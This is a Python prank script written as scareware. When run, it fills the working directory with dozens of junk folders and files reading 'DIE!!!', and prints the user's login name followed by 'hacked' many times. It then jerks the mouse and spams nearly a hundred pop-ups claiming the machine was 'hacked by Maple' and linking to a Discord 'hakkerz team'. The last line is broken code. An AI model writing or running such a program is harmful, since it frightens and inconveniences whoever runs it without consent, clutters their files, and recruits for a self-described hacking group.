import os
import pyautogui
from pymsgbox import alert
import getpass
#
pyautogui.moveTo(0 , 0)
os.makedirs('hello001')
os.makedirs('hello002')
os.makedirs('hello003')
os.makedirs('hello004')
os.makedirs('hello005')
os.makedirs('hello006')
os.makedirs('hello007')
os.makedirs('hello008')
os.makedirs('hello009')
os.makedirs('hello010')
os.makedirs('hello011')
os.makedirs('hello012')
os.makedirs('hello013')
os.makedirs('hello014')
os.makedirs('hello015')
os.makedirs('hello016')
os.makedirs('hello017')
os.makedirs('hello018')
os.makedirs('hello019')
os.makedirs('hello020')
#
os.makedirs('u')
os.system('mkdir suck u2 suck2 u3 suck3 u4 suck4 u5 suck5 u6 suck6 u7 suck7 u8 suck8 u9 suck9 u10 suck10')
#
os.system('echo DIE!!!> DIE!.txt')
os.system('echo DIE!!!> DIE!!.txt')
os.system('echo DIE!!!> DIE!!!.txt')
os.system('echo DIE!!!> DIE!!!2.txt')
os.system('echo DIE!!!> DIE!!!3.txt')
os.system('echo DIE!!!> DIE!!!4.txt')
os.system('echo DIE!!!> DIE!!!5.txt')
os.system('echo DIE!!!> DIE!!!6.txt')
os.system('echo DIE!!!> DIE!!!7.txt')
os.system('echo DIE!!!> DIE!!!8.txt')
os.system('echo DIE!!!> DIE!!!9.txt')
os.system('echo DIE!!!> DIE!!!0.txt')
os.system('echo DIE!!!> DIE!!!10.txt')
os.system('echo DIE!!!> DIE!!!11.txt')
os.system('echo DIE!!!> DIE!!!12.txt')
os.system('echo DIE!!!> DIE!!!13.txt')
os.system('echo DIE!!!> DIE!!!14.txt')
os.system('echo DIE!!!> DIE!!!15.txt')
#
username = getpass.getuser()
#
os.system('echo hello')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')
print(username + ' hacked')


#
pyautogui.moveTo(10, 10)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(1, 1)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(1, 1)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(1, 1)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(1, 1)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(1, 1)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(500, 500)
pyautogui.moveTo(500, 500)
#
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
alert(text='Hello, dood. Join to our hakkerz team! https://discord.gg/c4Cz6fG', title='u has been hacked by Maple.', button='Join')
#
os.system(echo end)
#
exit()